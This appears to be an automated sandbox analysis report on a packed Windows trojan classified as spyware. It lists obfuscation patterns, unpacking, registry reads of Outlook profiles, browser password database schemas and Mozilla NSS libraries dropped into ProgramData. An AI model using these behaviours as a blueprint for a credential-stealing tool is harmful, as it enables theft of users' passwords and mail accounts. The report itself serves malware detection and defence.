Source: file.exe, 00000000.00000003.2308583528.000000002F663000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2359171753.000000000037A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2308583528.000000002F663000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6BB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C6BB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C6BB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C65F280

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839	0_2_006EE839
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006DF8EE	0_2_006DF8EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007738D2	0_2_007738D2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F39F7	0_2_006F39F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E626D	0_2_006E626D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005AFA5D	0_2_005AFA5D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005B4250	0_2_005B4250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E1B61	0_2_006E1B61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006684AC	0_2_006684AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0066DD78	0_2_0066DD78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F5502	0_2_006F5502
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006ECDE9	0_2_006ECDE9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006DDDC8	0_2_006DDDC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E971D	0_2_006E971D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E47F0	0_2_006E47F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F1FAB	0_2_006F1FAB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E8787	0_2_005E8787
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6535A0	0_2_6C6535A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665440	0_2_6C665440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C545C	0_2_6C6C545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C542B	0_2_6C6C542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CAC00	0_2_6C6CAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695C10	0_2_6C695C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2C10	0_2_6C6A2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65D4E0	0_2_6C65D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C696CF0	0_2_6C696CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6664C0	0_2_6C6664C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D4D0	0_2_6C67D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B34A0	0_2_6C6B34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BC4A0	0_2_6C6BC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80	0_2_6C666C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FD00	0_2_6C66FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67ED10	0_2_6C67ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680512	0_2_6C680512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B85F0	0_2_6C6B85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C690DD0	0_2_6C690DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C6E63	0_2_6C6C6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C670	0_2_6C65C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2E4E	0_2_6C6A2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674640	0_2_6C674640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C679E50	0_2_6C679E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693E50	0_2_6C693E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9E30	0_2_6C6B9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A5600	0_2_6C6A5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697E10	0_2_6C697E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C76E3	0_2_6C6C76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65BEF0	0_2_6C65BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FEF0	0_2_6C66FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B4EA0	0_2_6C6B4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BE680	0_2_6C6BE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C675E90	0_2_6C675E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C669F00	0_2_6C669F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697710	0_2_6C697710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65DFE0	0_2_6C65DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686FF0	0_2_6C686FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A77A0	0_2_6C6A77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69F070	0_2_6C69F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678850	0_2_6C678850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D850	0_2_6C67D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69B820	0_2_6C69B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A4820	0_2_6C6A4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C667810	0_2_6C667810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67C0E0	0_2_6C67C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6958E0	0_2_6C6958E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C50C7	0_2_6C6C50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6860A0	0_2_6C6860A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D960	0_2_6C66D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB970	0_2_6C6AB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CB170	0_2_6C6CB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67A940	0_2_6C67A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C9A0	0_2_6C65C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68D9B0	0_2_6C68D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695190	0_2_6C695190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B2990	0_2_6C6B2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C699A60	0_2_6C699A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C671AF0	0_2_6C671AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69E2F0	0_2_6C69E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C698AC0	0_2_6C698AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6522A0	0_2_6C6522A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C684AA0	0_2_6C684AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66CAB0	0_2_6C66CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C2AB0	0_2_6C6C2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CBA90	0_2_6C6CBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66C370	0_2_6C66C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C655340	0_2_6C655340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69D320	0_2_6C69D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C53C8	0_2_6C6C53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65F380	0_2_6C65F380

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C68CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 003245C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6994D0 appears 90 times

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2388706540.000000006C8D5000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2387960445.000000006C6E2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: xfniszhi ZLIB complexity 0.9947508271496328

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@1/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C6B7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00339600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00339600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00333720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00333720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\VV9C9P5K.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2216020779.000000001D2CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201337914.000000001D2D8000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr, AAFIDGCFHIEHJJJJECAK.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2387412987.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1829376 > 1048576

Source: file.exe

Static PE information: Raw size of xfniszhi is bigger than: 0x100000 < 0x198800

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2387843050.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2387843050.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.320000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xfniszhi:EW;punnpugg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xfniszhi:EW;punnpugg:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00339860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1cd111 should be: 0x1c01ff

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: xfniszhi
Source: file.exe	Static PE information: section name: punnpugg
Source: file.exe	Static PE information: section name: .taggant
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0033B035 push ecx; ret	0_2_0033B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00782069 push 4565510Bh; mov dword ptr [esp], ebp	0_2_007823DF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0075885D push edi; mov dword ptr [esp], ebp	0_2_0075886D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B00B2 push 3C8B9F55h; mov dword ptr [esp], esi	0_2_009B00E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B00B2 push edx; mov dword ptr [esp], ecx	0_2_009B0126
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B00B2 push 42D77001h; mov dword ptr [esp], ebp	0_2_009B0136
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C283C push 2824E70Dh; mov dword ptr [esp], ebx	0_2_007C2848
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C283C push ebp; mov dword ptr [esp], ecx	0_2_007C299A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0078C83D push 7B7486A5h; mov dword ptr [esp], ebp	0_2_0078C87D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007F6039 push ebp; mov dword ptr [esp], 56FA210Dh	0_2_007F603E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007F6039 push ecx; mov dword ptr [esp], ebx	0_2_007F6867
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D0833 push edx; mov dword ptr [esp], 37B1545Ch	0_2_007D0859
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D0833 push edx; mov dword ptr [esp], 6778BBFAh	0_2_007D08BA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D0833 push 7287BFFCh; mov dword ptr [esp], ecx	0_2_007D0900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 53BFF500h; mov dword ptr [esp], eax	0_2_006EE8B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 174B831Ah; mov dword ptr [esp], ebp	0_2_006EE902
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push edi; mov dword ptr [esp], ebx	0_2_006EE94D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 15F93EB6h; mov dword ptr [esp], ecx	0_2_006EEA0D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 0F748FBBh; mov dword ptr [esp], edi	0_2_006EEAA7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push ecx; mov dword ptr [esp], 7D3A7F00h	0_2_006EEB1A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push ebx; mov dword ptr [esp], 791CB8E2h	0_2_006EEBC7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push ebx; mov dword ptr [esp], ecx	0_2_006EEBF3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 5EBB397Ah; mov dword ptr [esp], ecx	0_2_006EEC47
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push ebp; mov dword ptr [esp], 3F7B2691h	0_2_006EEC6C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 31665200h; mov dword ptr [esp], edi	0_2_006EEC79
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push esi; mov dword ptr [esp], edx	0_2_006EECB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 1A59B77Dh; mov dword ptr [esp], edx	0_2_006EEE3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 78BA80C3h; mov dword ptr [esp], ecx	0_2_006EEE42
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push ecx; mov dword ptr [esp], edx	0_2_006EEE62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push edi; mov dword ptr [esp], 74E314B2h	0_2_006EEE84
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push eax; mov dword ptr [esp], esi	0_2_006EEEE1

Source: file.exe

Static PE information: section name: xfniszhi entropy: 7.953005680311224

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
